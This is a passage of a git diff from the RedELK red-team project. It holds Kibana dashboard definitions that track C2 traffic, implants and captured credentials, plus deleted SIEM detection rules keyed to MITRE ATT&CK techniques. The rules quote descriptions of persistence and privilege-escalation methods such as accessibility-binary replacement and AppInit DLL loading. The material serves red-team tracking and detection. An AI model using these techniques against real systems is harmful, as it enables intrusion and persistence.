user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.3", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 179], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 181], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 183], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.3", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 185], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 187], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 190], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 192], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 194], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 196], "type": "visualization", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson deleted file mode 100644 index 4b79e7e7..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson +++ /dev/null @@ -1,266 +0,0 @@ -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly.\n~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment.\nThe macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\nAdversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1156","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1156] .bash_profile and .bashrc","query":"threat.technique.id: T1156","references":["https://attack.mitre.org/techniques/T1156","https://attack.mitre.org/techniques/T1546/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1156","name":".bash_profile and .bashrc","id":"T1156"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. Token Impersonation/Theft) or used to spawn a new process (i.e. Create Process with Token). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[1]\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1134","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1134] Access Token Manipulation","query":"threat.technique.id: T1134","references":["https://attack.mitre.org/techniques/T1134"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1134","name":"Access Token Manipulation","id":"T1134"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1134","name":"Access Token Manipulation","id":"T1134"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [1]\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). [2] The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. [3]\nOther accessibility features exist that may also be leveraged in a similar fashion: [2][4]\nOn-Screen Keyboard: C:\\Windows\\System32\\osk.exe\nMagnifier: C:\\Windows\\System32\\Magnify.exe\nNarrator: C:\\Windows\\System32\\Narrator.exe\nDisplay Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\nApp Switcher: C:\\Windows\\System32\\AtBroker.exe","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1015","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1015] Accessibility Features","query":"threat.technique.id: T1015","references":["https://attack.mitre.org/techniques/T1015","https://attack.mitre.org/techniques/T1546/008"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1015","name":"Accessibility Features","id":"T1015"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1015","name":"Accessibility Features","id":"T1015"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nAdversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1531","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1531] Account Access Removal","query":"threat.technique.id: T1531","references":["https://attack.mitre.org/techniques/T1531"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1531","name":"Account Access Removal","id":"T1531"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1087","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1087] Account Discovery","query":"threat.technique.id: T1087","references":["https://attack.mitre.org/techniques/T1087"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1087","name":"Account Discovery","id":"T1087"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1098","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1098] Account Manipulation","query":"threat.technique.id: T1098","references":["https://attack.mitre.org/techniques/T1098"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1098","name":"Account Manipulation","id":"T1098"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1098","name":"Account Manipulation","id":"T1098"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. [1]\nSimilar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1182","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1182] AppCert DLLs","query":"threat.technique.id: T1182","references":["https://attack.mitre.org/techniques/T1182","https://attack.mitre.org/techniques/T1546/009"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1182","name":"AppCert DLLs","id":"T1182"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1182","name":"AppCert DLLs","id":"T1182"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. [1]\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. [2] Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1103","language":"kuery","license":"BSD 